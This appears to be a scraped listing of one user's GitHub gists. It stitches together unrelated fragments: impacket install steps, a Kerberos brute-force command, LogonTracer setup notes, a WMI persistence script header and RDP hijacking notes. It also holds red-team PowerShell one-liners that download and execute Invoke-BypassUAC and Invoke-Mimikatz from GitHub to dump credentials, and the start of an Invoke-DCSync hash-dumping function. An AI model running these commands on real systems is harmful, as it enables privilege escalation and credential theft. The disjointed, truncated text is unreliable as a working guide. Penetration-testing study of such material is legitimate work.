Jesse Moore jessefmoore

Intro

This document pools several awesome tools and blog entries together (see "Resources" at the end of this doc) in an attempt to automate the process of getting an initial foothold on a network in a situation where you have no valid credentials.

Download and install ntlmrelay

Ok, so one weird thing I'm trying to figure out is if I install ntlmrelay as the first tool we'll use, these steps seem to work ok:

git clone https://github.com/CoreSecurity/impacket.git /opt/impacket
cd /opt/impacket
pip install .

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

How to go from (almost) zero to viewing a graph of events with LogonTracer

The Readme for the LogonTracer project is missing a couple of steps so I'm jotting down all the kinks. I'm glossing over installing Debian into a VM.

There is little thought for security in this setup, all actions are taken as root user, if using in production you'll probably need to 'sudo' a few places.

My Setup

I set this up in about 30 minutes using a VM in VMware workstation. I was able to connect to the Logontracer webpage from my host OS.

	# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
	# https://wikileaks.org/ciav7p1/cms/page_14587908.html

	<#
	.SYNOPSIS
	This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
	#>

	$EventFilterName = "Fileless WMI Persistence SystemUptime"

	RDP Eavesdropping and Hijacking
	*******************************
	I spent some time this evening looking at ways to eavesdrop and hijack RDP sessions. Here is a gist of (semi) interesting findings
	that is not very new...

	===========
	Inspiration
	===========
	As you may already know...

	# IMPORTANT!
	# This gist has been transformed into a github repo
	# You can find the most recent version there:
	# https://github.com/Neo23x0/auditd

	# ___ ___ __ __
	# / \| __ ______/ (_) /_____/ /
	# / /\| \|/ / / / __ / / __/ __ /
	# / ___ / /_/ / /_/ / / /_/ /_/ /
	# /_/ \|_\__,_/\__,_/_/\__/\__,_/


	_ _____ ___ __ __ ___ ____ ____ _____ ____ _____ _____ _ __ __
	/ \\|_ _/ _ \\| \/ \|_ _/ ___\| \| _ \\| ____\| _ \ \|_ _\| ____\| / \ \| \/ \|
	/ _ \ \| \|\| \| \| \| \|\/\| \|\| \| \| \| \|_) \| _\| \| \| \| \| \| \| \| _\| / _ \ \| \|\/\| \|
	/ ___ \\| \|\| \|_\| \| \| \| \|\| \| \|___ \| _ <\| \|___\| \|_\| \| \| \| \| \|___ / ___ \\| \| \| \|
	/_/ \_\_\| \___/\|_\| \|_\|___\____\| \|_\| \_\_____\|____/ \|_\| \|_____/_/ \_\_\| \|_\|



	[******BEGIN TEST*****] Data Compressed T1002 has 3 Test(s)

	# Description:
	# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

	# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

	# Invoke-Mimikatz: Dump credentials from memory
	powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

	# Import Mimikatz Module to run further commands

	function Invoke-DCSync
	{
	<#
	.SYNOPSIS

	Uses dcsync from mimikatz to collect NTLM hashes from the domain.

	Author: @monoxgas
	Improved by: @harmj0y